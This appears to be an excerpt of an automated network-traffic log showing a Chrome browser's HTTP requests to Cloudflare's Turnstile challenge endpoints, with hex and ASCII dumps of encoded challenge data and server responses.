                                                                                                                                      23192.168.2.1649741104.17.3.1844435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:39 UTC916OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/830379481:1715189460:4WJq2FlgaBnGPk-EL3xJ9pAJ6u5-Y1Cc3OADuoMfqYo/880b6b356a282766/84d6ba6304ae385 HTTP/1.1
                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Content-Length: 30946
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      Content-type: application/x-www-form-urlencoded
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      CF-Challenge: 84d6ba6304ae385
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: */*
                                                                                                                                      Origin: https://challenges.cloudflare.com
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/l704j/0x4AAAAAAAXFrE9g55weHUfb/auto/normal
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-05-08 18:12:39 UTC16384OUTData Raw: 76 5f 38 38 30 62 36 62 33 35 36 61 32 38 32 37 36 36 3d 6f 24 46 4b 44 6d 69 76 25 32 62 69 24 46 2b 6d 79 4e 49 69 37 4d 44 4b 5a 4f 4f 4d 41 4b 78 74 65 4a 4d 73 4d 78 64 69 43 69 77 4d 4e 4b 69 6a 74 4d 67 4d 6e 36 4d 69 2b 64 4d 70 4d 67 74 67 6a 66 63 46 64 4d 31 74 6d 34 4d 5a 61 58 4b 4d 77 44 64 4e 66 4d 46 64 69 4c 72 6d 64 59 76 76 63 2d 4d 4e 4a 4d 50 59 4e 4d 69 35 45 34 74 4d 35 4d 69 30 65 69 5a 51 30 4d 70 4c 4d 49 4b 6b 76 4f 4d 59 54 6c 47 64 37 66 4d 67 75 64 52 58 64 4e 4c 76 5a 72 6a 63 49 6e 39 32 58 64 4d 52 4d 6b 30 6c 58 6f 4e 74 33 46 4d 63 58 43 4a 76 58 72 76 63 43 35 41 46 4b 6b 73 7a 31 4b 4d 6f 6d 64 4d 6b 4d 65 6a 76 58 43 78 5a 4d 4e 6a 55 75 35 59 6a 73 34 66 79 4b 2b 69 6f 43 2b 68 36 6f 73 68 53 70 33 66 76 24 64 4e 4f
                                                                                                                                      Data Ascii: v_880b6b356a282766=o$FKDmiv%2bi$F+myNIi7MDKZOOMAKxteJMsMxdiCiwMNKijtMgMn6Mi+dMpMgtgjfcFdM1tm4MZaXKMwDdNfMFdiLrmdYvvc-MNJMPYNMi5E4tM5Mi0eiZQ0MpLMIKkvOMYTlGd7fMgudRXdNLvZrjcIn92XdMRMk0lXoNt3FMcXCJvXrvcC5AFKksz1KMomdMkMejvXCxZMNjUu5Yjs4fyK+ioC+h6oshSp3fv$dNO
                                                                                                                                      2024-05-08 18:12:39 UTC14562OUTData Raw: 47 6a 46 67 2d 62 52 62 57 64 50 4b 65 4d 2d 4d 67 64 4e 2b 4d 58 74 24 4d 46 43 63 2b 69 6a 4b 63 4d 6d 4b 4d 66 4d 6d 4b 6b 64 4d 24 4d 48 4d 78 32 64 79 4d 51 4d 6f 4b 4d 4f 4d 53 75 6f 46 4e 66 4d 35 24 6d 4d 6d 33 4d 53 4b 59 2b 69 6b 4b 72 4b 6d 58 4e 34 4d 30 4b 4e 58 4d 31 74 31 46 7a 74 6d 55 4d 6f 64 6b 58 69 31 4b 58 4d 6a 75 69 73 4d 70 4b 65 64 4d 76 64 63 4d 49 4d 4d 48 4d 4c 49 57 68 4e 79 4d 24 30 6d 50 69 2b 33 49 64 7a 66 4b 76 64 48 32 4b 75 69 4c 4d 2b 48 63 76 69 37 4b 37 4d 76 46 69 4c 4d 6a 4d 6d 2b 6d 65 6a 37 64 65 64 4e 79 4d 2d 4d 51 58 4e 7a 4d 6d 4d 57 4a 69 6b 4b 2b 4b 43 4c 4d 78 49 4a 64 69 70 69 4f 74 65 76 46 41 47 74 4d 59 75 78 79 4d 71 62 43 4d 4d 2b 67 79 69 46 4d 4e 49 44 30 4d 6f 74 4e 67 69 43 69 63 64 63 2b 4d 65
                                                                                                                                      Data Ascii: GjFg-bRbWdPKeM-MgdN+MXt$MFCc+ijKcMmKMfMmKkdM$MHMx2dyMQMoKMOMSuoFNfM5$mMm3MSKY+ikKrKmXN4M0KNXM1t1FztmUModkXi1KXMjuisMpKedMvdcMIMMHMLIWhNyM$0mPi+3IdzfKvdH2KuiLM+Hcvi7K7MvFiLMjMm+mej7dedNyM-MQXNzMmMWJikK+KCLMxIJdipiOtevFAGtMYuxyMqbCMM+gyiFMNID0MotNgiCicdc+Me
                                                                                                                                      2024-05-08 18:12:40 UTC350INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 08 May 2024 18:12:40 GMT
                                                                                                                                      Content-Type: text/plain; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      cf-chl-gen: VOLPm0+0S8l5g9dhqx6YjaYrvnsLE27JwpCFOVAAR3fdkBPujYKUuD6TqVxM35CO$DdNWfXYOrpBP9zc7i0j6mg==
                                                                                                                                      vary: accept-encoding
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 880b6b560b50ec70-SEA
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      2024-05-08 18:12:40 UTC778INData Raw: 33 30 33 0d 0a 6b 59 75 45 6a 6d 42 6b 61 47 65 49 65 58 42 74 68 6f 2b 50 62 6e 52 36 6a 6f 47 53 6d 6c 2b 46 6c 70 2b 6d 65 70 2b 6a 6a 37 43 5a 61 4c 43 45 6e 71 43 44 69 70 53 36 69 37 47 6d 6a 62 79 52 71 71 79 50 6a 35 64 38 74 62 61 78 68 4d 69 66 74 72 69 6e 76 36 71 73 6e 73 36 30 79 72 43 72 6a 72 69 70 75 37 44 50 70 74 79 37 6d 4f 47 7a 76 4c 48 47 35 62 75 6b 36 35 33 57 32 4c 76 49 7a 2b 54 6b 38 74 37 72 39 36 33 69 35 4d 71 78 31 63 65 2b 79 2f 48 4a 79 77 50 41 39 39 66 61 34 63 4c 69 44 65 66 5a 7a 75 50 71 33 64 76 68 36 4e 2f 57 42 76 48 31 36 2b 6e 77 36 66 6f 64 2b 4f 7a 76 36 2f 76 67 4a 66 41 54 46 51 63 73 41 43 2f 37 42 41 6f 4e 37 67 67 4d 45 54 63 4a 44 68 58 31 2b 78 67 78 4f 66 6f 4a 2f 54 67 61 2f 6a 6f 2b 47 55 6b 6c 50 41
                                                                                                                                      Data Ascii: 303kYuEjmBkaGeIeXBtho+PbnR6joGSml+Flp+mep+jj7CZaLCEnqCDipS6i7GmjbyRqqyPj5d8tbaxhMiftrinv6qsns60yrCrjripu7DPpty7mOGzvLHG5buk653W2LvIz+Tk8t7r963i5Mqx1ce+y/HJywPA99fa4cLiDefZzuPq3dvh6N/WBvH16+nw6fod+Ozv6/vgJfATFQcsAC/7BAoN7ggMETcJDhX1+xgxOfoJ/Tga/jo+GUklPA
                                                                                                                                      2024-05-08 18:12:40 UTC1369INData Raw: 32 35 61 30 0d 0a 54 76 63 65 4a 77 72 61 33 78 39 76 64 78 70 72 64 34 64 6a 51 33 37 65 79 31 72 61 2b 79 4d 66 63 70 38 4c 49 77 72 72 62 72 74 7a 42 73 2f 6a 72 34 62 48 4d 74 4c 6e 31 37 65 47 38 41 65 7a 33 32 63 54 35 38 4d 4c 34 35 67 4c 64 39 77 4c 34 7a 67 48 75 43 75 4d 41 43 67 45 58 43 66 59 53 35 67 67 53 43 52 30 52 2f 68 6e 62 45 42 6f 52 4b 78 6b 48 49 65 73 73 2f 75 38 78 38 42 41 45 41 69 51 67 4d 43 34 45 4c 42 6b 4b 4e 78 6f 56 39 7a 63 7a 47 55 51 52 4a 7a 59 33 42 45 41 36 54 42 6b 76 52 6a 38 4d 53 45 70 55 49 54 64 56 47 44 51 57 47 53 6f 79 4e 52 78 4c 4c 54 5a 47 5a 78 6c 48 50 45 56 46 4e 79 30 38 52 6b 73 36 52 6b 46 78 51 6b 39 68 63 6d 6b 33 57 56 51 35 56 32 78 50 64 7a 35 6a 59 31 42 5a 51 6f 53 48 5a 46 68 67 52 59 4b 4b
                                                                                                                                      Data Ascii: 25a0TvceJwra3x9vdxprd4djQ37ey1ra+yMfcp8LIwrrbrtzBs/jr4bHMtLn17eG8Aez32cT58ML45gLd9wL4zgHuCuMACgEXCfYS5ggSCR0R/hnbEBoRKxkHIess/u8x8BAEAiQgMC4ELBkKNxoV9zczGUQRJzY3BEA6TBkvRj8MSEpUITdVGDQWGSoyNRxLLTZGZxlHPEVFNy08Rks6RkFxQk9hcmk3WVQ5V2xPdz5jY1BZQoSHZFhgRYKK
                                                                                                                                      2024-05-08 18:12:40 UTC1369INData Raw: 2b 7a 31 74 6d 74 6b 74 75 6e 7a 71 75 78 72 37 75 39 70 4c 6d 2f 77 72 47 31 76 61 4c 72 75 38 66 4a 37 4b 33 73 71 72 50 67 71 4e 2f 78 38 38 62 70 74 37 6a 63 32 39 7a 4c 34 66 53 2b 42 38 2f 59 41 75 4c 45 35 4d 50 64 41 4f 62 6b 33 66 77 50 35 51 2f 71 39 65 58 77 42 65 55 62 2b 2b 6e 5a 39 74 6e 62 2f 4e 73 57 39 2f 72 6d 49 68 54 70 4c 75 30 42 35 79 6e 2b 49 78 77 53 49 78 67 4b 4e 52 51 4f 44 42 6a 30 2f 6a 4d 58 4f 30 41 39 47 6a 6f 58 48 30 49 47 41 6a 30 70 4e 67 45 73 51 68 34 6e 4c 56 52 58 51 54 67 69 56 55 6b 73 4f 6c 74 55 47 79 6f 69 55 6a 4d 76 4e 56 41 61 59 79 70 45 48 6d 6c 61 53 79 64 4d 58 7a 46 6d 58 53 31 6c 55 32 35 43 5a 47 35 6d 54 6e 34 32 54 45 78 77 64 6d 35 56 64 33 68 42 69 56 6c 35 68 6f 74 42 68 57 78 71 67 32 78 75 67
                                                                                                                                      Data Ascii: +z1tmtktunzquxr7u9pLm/wrG1vaLru8fJ7K3sqrPgqN/x88bpt7jc29zL4fS+B8/YAuLE5MPdAObk3fwP5Q/q9eXwBeUb++nZ9tnb/NsW9/rmIhTpLu0B5yn+IxwSIxgKNRQODBj0/jMXO0A9GjoXH0IGAj0pNgEsQh4nLVRXQTgiVUksOltUGyoiUjMvNVAaYypEHmlaSydMXzFmXS1lU25CZG5mTn42TExwdm5Vd3hBiVl5hotBhWxqg2xug
                                                                                                                                      2024-05-08 18:12:40 UTC1369INData Raw: 6e 31 4d 7a 5a 6d 5a 53 5a 7a 4b 4f 37 75 37 72 58 35 62 37 59 70 4d 33 45 32 63 6a 4d 79 74 54 6b 39 74 44 6f 39 4c 48 70 38 2f 72 37 31 72 66 36 34 50 6e 69 31 2f 66 32 77 50 73 44 78 39 77 49 2f 64 67 45 38 51 76 52 30 52 66 33 43 4f 50 57 7a 50 66 73 38 50 58 75 32 50 37 67 38 76 55 46 38 75 55 54 4b 76 62 6f 48 66 34 5a 36 2b 30 4b 43 41 41 76 45 53 30 78 4a 42 63 63 43 68 59 62 48 7a 51 4b 4c 79 41 33 51 44 55 6e 46 55 51 6a 50 67 51 61 4b 79 78 45 47 6a 73 77 52 78 55 78 4e 79 56 55 4e 7a 68 5a 58 45 35 49 4e 46 41 62 57 57 45 7a 4e 54 70 44 52 6d 46 62 52 6d 4d 6d 50 43 5a 6f 51 6e 45 73 5a 31 42 47 62 48 42 46 65 48 31 72 53 57 6c 72 54 6e 78 58 65 46 5a 65 63 49 69 46 53 6f 74 61 69 33 70 58 68 32 4e 36 63 6e 79 4d 63 31 56 70 57 59 4a 76 5a 47
                                                                                                                                      Data Ascii: n1MzZmZSZzKO7u7rX5b7YpM3E2cjMytTk9tDo9LHp8/r71rf64Pni1/f2wPsDx9wI/dgE8QvR0Rf3COPWzPfs8PXu2P7g8vUF8uUTKvboHf4Z6+0KCAAvES0xJBccChYbHzQKLyA3QDUnFUQjPgQaKyxEGjswRxUxNyVUNzhZXE5INFAbWWEzNTpDRmFbRmMmPCZoQnEsZ1BGbHBFeH1rSWlrTnxXeFZecIiFSotai3pXh2N6cnyMc1VpWYJvZG
                                                                                                                                      2024-05-08 18:12:40 UTC1369INData Raw: 7a 39 37 61 78 75 53 67 78 61 57 6f 75 2b 65 71 76 4b 33 77 30 62 44 44 37 39 66 45 74 66 65 30 75 4d 76 34 75 73 79 39 2f 73 45 45 75 39 72 7a 77 4e 49 4b 32 73 55 47 37 2f 33 77 42 51 2f 70 43 41 66 4d 46 78 48 30 46 65 4d 51 31 39 6a 66 47 42 77 58 48 51 4d 53 45 78 49 61 39 51 76 33 49 53 59 71 4b 75 37 77 45 43 62 6d 4e 79 49 76 4c 41 73 7a 4e 52 77 79 4d 2f 6f 76 47 54 67 61 46 45 41 62 2f 53 68 46 49 7a 56 4e 48 42 68 46 4a 79 45 39 49 43 51 49 4d 46 4a 4a 49 7a 46 46 58 42 5a 62 58 55 45 77 4e 45 46 58 51 46 77 37 57 6d 46 4d 51 79 78 57 5a 30 4d 35 51 31 39 4a 4b 31 35 66 64 55 46 4c 5a 32 35 37 53 6d 6c 72 65 45 78 63 4f 30 35 53 57 32 52 4a 58 6d 56 59 56 6c 78 6a 57 6b 4e 6a 5a 59 57 55 69 6f 52 6c 65 6d 4f 57 61 34 57 4e 65 59 69 5a 57 56 2b
                                                                                                                                      Data Ascii: z97axuSgxaWou+eqvK3w0bDD79fEtfe0uMv4usy9/sEEu9rzwNIK2sUG7/3wBQ/pCAfMFxH0FeMQ19jfGBwXHQMSExIa9Qv3ISYqKu7wECbmNyIvLAszNRwyM/ovGTgaFEAb/ShFIzVNHBhFJyE9ICQIMFJJIzFFXBZbXUEwNEFXQFw7WmFMQyxWZ0M5Q19JK15fdUFLZ257SmlreExcO05SW2RJXmVYVlxjWkNjZYWUioRlemOWa4WNeYiZWV+
                                                                                                                                      2024-05-08 18:12:40 UTC1369INData Raw: 4e 61 33 79 65 6a 44 35 4f 36 75 33 73 50 57 39 76 48 44 35 76 76 6b 73 75 72 39 39 37 62 4b 41 75 2f 35 34 51 65 35 41 51 62 45 42 39 73 47 44 38 33 62 35 4d 2f 6d 33 77 6f 53 36 75 2f 7a 30 51 59 57 45 74 76 79 31 75 2f 65 34 51 44 31 4b 42 49 6c 33 2b 4d 58 4c 69 49 73 4b 51 63 79 37 76 49 55 4a 44 49 4d 4a 69 55 31 44 78 45 53 43 41 38 4e 47 42 73 34 42 50 73 67 46 67 55 57 4e 52 73 61 44 54 6b 76 49 6c 49 39 53 53 34 66 52 43 63 75 56 55 52 52 4a 68 31 4c 46 7a 4a 65 4f 68 30 6c 5a 6c 42 61 4e 6d 5a 44 53 32 77 32 57 45 73 70 4b 56 31 51 50 6b 42 6b 52 30 70 36 55 32 35 4a 50 6d 68 78 4f 58 35 74 59 31 61 44 63 48 31 61 69 48 64 44 5a 6b 31 36 58 35 42 63 66 49 56 4e 6b 57 39 6f 6c 32 57 46 68 32 36 55 65 47 70 68 64 58 46 38 66 6e 57 54 65 36 4e 63
                                                                                                                                      Data Ascii: Na3yejD5O6u3sPW9vHD5vvksur997bKAu/54Qe5AQbEB9sGD83b5M/m3woS6u/z0QYWEtvy1u/e4QD1KBIl3+MXLiIsKQcy7vIUJDIMJiU1DxESCA8NGBs4BPsgFgUWNRsaDTkvIlI9SS4fRCcuVURRJh1LFzJeOh0lZlBaNmZDS2w2WEspKV1QPkBkR0p6U25JPmhxOX5tY1aDcH1aiHdDZk16X5BcfIVNkW9ol2WFh26UeGphdXF8fnWTe6Nc
                                                                                                                                      2024-05-08 18:12:40 UTC1369INData Raw: 6e 6a 71 2f 50 6d 31 75 76 34 37 39 6e 76 79 64 50 33 7a 65 48 31 34 66 62 6c 39 4f 53 2f 42 4f 6b 41 2f 67 41 44 2f 50 66 61 41 67 66 50 2f 4f 72 7a 44 74 55 4b 44 76 77 49 48 52 54 77 39 68 49 4e 42 51 50 39 47 4e 38 6f 47 77 73 67 4c 53 51 4f 4a 50 30 51 45 78 48 77 44 44 41 46 4e 43 4d 79 2b 41 38 56 4e 52 48 79 4d 6a 59 33 48 7a 49 2b 41 45 6b 37 4b 51 51 39 4a 45 51 4d 4f 53 74 4a 4a 56 45 7a 53 6b 74 5a 53 44 6b 5a 55 54 52 53 53 44 4a 4d 57 46 73 37 56 6b 51 35 4a 56 39 47 53 43 56 4f 5a 45 35 63 5a 46 74 56 4c 57 78 74 52 57 46 61 62 44 68 6c 55 33 56 52 67 47 70 6a 55 6e 6c 78 5a 57 56 38 63 34 42 2f 67 49 4e 71 62 6d 71 44 63 34 68 69 68 48 5a 51 56 59 57 45 61 70 6c 35 6b 5a 64 76 65 70 52 66 59 58 75 45 6e 33 65 55 6e 57 6c 2b 72 36 56 39 73
                                                                                                                                      Data Ascii: njq/Pm1uv479nvydP3zeH14fbl9OS/BOkA/gAD/PfaAgfP/OrzDtUKDvwIHRTw9hINBQP9GN8oGwsgLSQOJP0QExHwDDAFNCMy+A8VNRHyMjY3HzI+AEk7KQQ9JEQMOStJJVEzSktZSDkZUTRSSDJMWFs7VkQ5JV9GSCVOZE5cZFtVLWxtRWFabDhlU3VRgGpjUnlxZWV8c4B/gINqbmqDc4hihHZQVYWEapl5kZdvepRfYXuEn3eUnWl+r6V9s
                                                                                                                                      2024-05-08 18:12:40 UTC1369INData Raw: 46 36 4e 72 4a 78 64 33 65 7a 63 33 7a 34 76 66 56 38 4f 58 6c 31 66 66 6f 32 4d 77 41 37 51 51 4d 41 50 76 67 30 41 66 31 43 77 67 47 2b 64 51 59 45 50 30 55 2b 51 38 43 32 2b 41 47 45 50 55 6f 47 52 50 6b 4b 42 6b 59 2f 4f 67 64 45 51 49 77 49 79 41 47 44 69 6b 6a 38 2f 77 70 48 2f 63 77 4d 79 4d 69 46 6a 59 77 46 68 6f 36 4b 30 41 69 53 43 30 65 4a 6a 38 7a 4d 51 31 49 4f 43 59 71 54 44 70 51 4b 6a 34 2f 47 42 6c 51 51 6b 4a 6b 55 55 64 46 49 56 56 54 4a 46 78 66 56 79 67 78 58 31 49 73 4d 57 5a 58 62 45 70 71 57 55 70 4f 63 46 39 30 53 6e 4e 6b 55 6b 36 41 5a 30 42 4a 61 6d 75 41 58 6e 35 75 62 55 6d 42 64 47 4a 65 67 33 65 4c 69 49 70 37 65 56 6d 50 69 47 31 68 6b 6f 4e 79 64 70 53 46 64 6e 71 59 69 36 43 73 6e 49 2b 4e 62 61 43 53 6b 6e 36 57 6c 36
                                                                                                                                      Data Ascii: F6NrJxd3ezc3z4vfV8OXl1ffo2MwA7QQMAPvg0Af1CwgG+dQYEP0U+Q8C2+AGEPUoGRPkKBkY/OgdEQIwIyAGDikj8/wpH/cwMyMiFjYwFho6K0AiSC0eJj8zMQ1IOCYqTDpQKj4/GBlQQkJkUUdFIVVTJFxfVygxX1IsMWZXbEpqWUpOcF90SnNkUk6AZ0BJamuAXn5ubUmBdGJeg3eLiIp7eVmPiG1hkoNydpSFdnqYi6CsnI+NbaCSkn6Wl6


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      24192.168.2.1649742104.17.2.1844435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:40 UTC486OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/830379481:1715189460:4WJq2FlgaBnGPk-EL3xJ9pAJ6u5-Y1Cc3OADuoMfqYo/880b6b356a282766/84d6ba6304ae385 HTTP/1.1
                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-05-08 18:12:41 UTC377INHTTP/1.1 400 Bad Request
                                                                                                                                      Date: Wed, 08 May 2024 18:12:40 GMT
                                                                                                                                      Content-Type: application/json
                                                                                                                                      Content-Length: 7
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                      cf-chl-out: c+d2CR/zxWfUsPfjmSPvrg==$rpCFnTTeiFxTai4yw4F3YA==
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 880b6b5bbd25761b-SEA
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      2024-05-08 18:12:41 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                      Data Ascii: invalid


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      25192.168.2.1649743104.17.3.1844435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:42 UTC916OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/830379481:1715189460:4WJq2FlgaBnGPk-EL3xJ9pAJ6u5-Y1Cc3OADuoMfqYo/880b6b356a282766/84d6ba6304ae385 HTTP/1.1
                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Content-Length: 33946
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      Content-type: application/x-www-form-urlencoded
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      CF-Challenge: 84d6ba6304ae385
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: */*
                                                                                                                                      Origin: https://challenges.cloudflare.com
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/l704j/0x4AAAAAAAXFrE9g55weHUfb/auto/normal
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-05-08 18:12:42 UTC16384OUTData Raw: 76 5f 38 38 30 62 36 62 33 35 36 61 32 38 32 37 36 36 3d 6f 24 46 4b 44 6d 69 76 25 32 62 69 24 46 2b 6d 79 4e 49 69 37 4d 44 4b 5a 4f 4f 4d 41 4b 78 74 65 4a 4d 73 4d 78 64 69 43 69 77 4d 4e 4b 69 6a 74 4d 67 4d 6e 36 4d 69 2b 64 4d 70 4d 67 74 67 6a 66 63 46 64 4d 31 74 6d 34 4d 5a 61 58 4b 4d 77 44 64 4e 66 4d 46 64 69 4c 72 6d 64 59 76 76 63 2d 4d 4e 4a 4d 50 59 4e 4d 69 35 45 34 74 4d 35 4d 69 30 65 69 5a 51 30 4d 70 4c 4d 49 4b 6b 76 4f 4d 59 54 6c 47 64 37 66 4d 67 75 64 52 58 64 4e 4c 76 5a 72 6a 63 49 6e 39 32 58 64 4d 52 4d 6b 30 6c 58 6f 4e 74 33 46 4d 63 58 43 4a 76 58 72 76 63 43 35 41 46 4b 6b 73 7a 31 4b 4d 6f 6d 64 4d 6b 4d 65 6a 76 58 43 78 5a 4d 4e 6a 55 75 35 59 6a 73 34 66 79 4b 2b 69 6f 43 2b 68 36 6f 73 68 53 70 33 66 76 24 64 4e 4f
                                                                                                                                      Data Ascii: v_880b6b356a282766=o$FKDmiv%2bi$F+myNIi7MDKZOOMAKxteJMsMxdiCiwMNKijtMgMn6Mi+dMpMgtgjfcFdM1tm4MZaXKMwDdNfMFdiLrmdYvvc-MNJMPYNMi5E4tM5Mi0eiZQ0MpLMIKkvOMYTlGd7fMgudRXdNLvZrjcIn92XdMRMk0lXoNt3FMcXCJvXrvcC5AFKksz1KMomdMkMejvXCxZMNjUu5Yjs4fyK+ioC+h6oshSp3fv$dNO
                                                                                                                                      2024-05-08 18:12:42 UTC16384OUTData Raw: 47 6a 46 67 2d 62 52 62 57 64 50 4b 65 4d 2d 4d 67 64 4e 2b 4d 58 74 24 4d 46 43 63 2b 69 6a 4b 63 4d 6d 4b 4d 66 4d 6d 4b 6b 64 4d 24 4d 48 4d 78 32 64 79 4d 51 4d 6f 4b 4d 4f 4d 53 75 6f 46 4e 66 4d 35 24 6d 4d 6d 33 4d 53 4b 59 2b 69 6b 4b 72 4b 6d 58 4e 34 4d 30 4b 4e 58 4d 31 74 31 46 7a 74 6d 55 4d 6f 64 6b 58 69 31 4b 58 4d 6a 75 69 73 4d 70 4b 65 64 4d 76 64 63 4d 49 4d 4d 48 4d 4c 49 57 68 4e 79 4d 24 30 6d 50 69 2b 33 49 64 7a 66 4b 76 64 48 32 4b 75 69 4c 4d 2b 48 63 76 69 37 4b 37 4d 76 46 69 4c 4d 6a 4d 6d 2b 6d 65 6a 37 64 65 64 4e 79 4d 2d 4d 51 58 4e 7a 4d 6d 4d 57 4a 69 6b 4b 2b 4b 43 4c 4d 78 49 4a 64 69 70 69 4f 74 65 76 46 41 47 74 4d 59 75 78 79 4d 71 62 43 4d 4d 2b 67 79 69 46 4d 4e 49 44 30 4d 6f 74 4e 67 69 43 69 63 64 63 2b 4d 65
                                                                                                                                      Data Ascii: GjFg-bRbWdPKeM-MgdN+MXt$MFCc+ijKcMmKMfMmKkdM$MHMx2dyMQMoKMOMSuoFNfM5$mMm3MSKY+ikKrKmXN4M0KNXM1t1FztmUModkXi1KXMjuisMpKedMvdcMIMMHMLIWhNyM$0mPi+3IdzfKvdH2KuiLM+Hcvi7K7MvFiLMjMm+mej7dedNyM-MQXNzMmMWJikK+KCLMxIJdipiOtevFAGtMYuxyMqbCMM+gyiFMNID0MotNgiCicdc+Me
                                                                                                                                      2024-05-08 18:12:42 UTC1178OUTData Raw: 59 4b 62 30 78 69 6c 4b 6a 74 67 4f 4e 64 36 36 64 4e 62 35 43 74 2b 4d 64 51 61 66 48 35 70 76 70 7a 63 6c 6d 46 58 65 67 7a 63 4d 66 73 31 72 6f 57 62 4b 4d 6a 33 4b 36 4b 4d 31 4f 77 6a 6f 6e 62 76 39 2d 58 4d 77 61 32 35 71 53 44 39 32 6e 46 6d 47 6f 4f 46 7a 63 71 43 73 7a 4f 41 49 67 56 4d 7a 59 46 76 7a 48 6c 78 4b 6f 48 51 54 48 51 64 39 74 69 2b 4d 45 4d 2d 2b 4d 73 46 64 74 58 67 38 49 4d 39 4d 37 6b 59 73 36 6c 4b 48 49 6f 65 5a 62 4b 78 56 30 58 46 53 78 6f 54 4d 5a 4d 51 71 58 65 67 49 4d 67 64 58 73 43 74 4d 49 65 69 44 4d 78 4d 31 4b 7a 4d 4f 39 69 48 47 43 66 4d 57 44 6c 6b 31 73 67 76 77 43 64 55 4f 77 77 63 56 24 5a 43 52 62 6e 6d 4b 6b 43 4a 6f 63 31 49 31 36 49 76 4d 6b 49 58 37 45 39 63 34 6d 57 73 76 51 4e 6d 4d 65 6a 4a 44 63 47 36
                                                                                                                                      Data Ascii: YKb0xilKjtgONd66dNb5Ct+MdQafH5pvpzclmFXegzcMfs1roWbKMj3K6KM1Owjonbv9-XMwa25qSD92nFmGoOFzcqCszOAIgVMzYFvzHlxKoHQTHQd9ti+MEM-+MsFdtXg8IM9M7kYs6lKHIoeZbKxV0XFSxoTMZMQqXegIMgdXsCtMIeiDMxM1KzMO9iHGCfMWDlk1sgvwCdUOwwcV$ZCRbnmKkCJoc1I16IvMkIX7E9c4mWsvQNmMejJDcG6
                                                                                                                                      2024-05-08 18:12:43 UTC478INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 08 May 2024 18:12:43 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      cf-chl-out-s: +IIEDaGDHYXuqT/MbnqRVQ==$K3elIQ5wUX6gUz0wF9U4Ww==
                                                                                                                                      cf-chl-out: zkTnl9IM1TNdvdQWkzJpIJElmYYCXc3kHCmlLJNPaOgnEKsJ1atE2b1QoqrzV8HRD6kl5Z3cYPVAft4rK3EeRgujJqZTtbF/03ynUnyfq/gAOEpzq1YYJ2+dfIaSw8ek$MRNSAcNZmk2DSACRkRrShw==
                                                                                                                                      vary: accept-encoding
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 880b6b668863c398-SEA
                                                                                                                                      alt-svc: h3=":443"; ma=86400
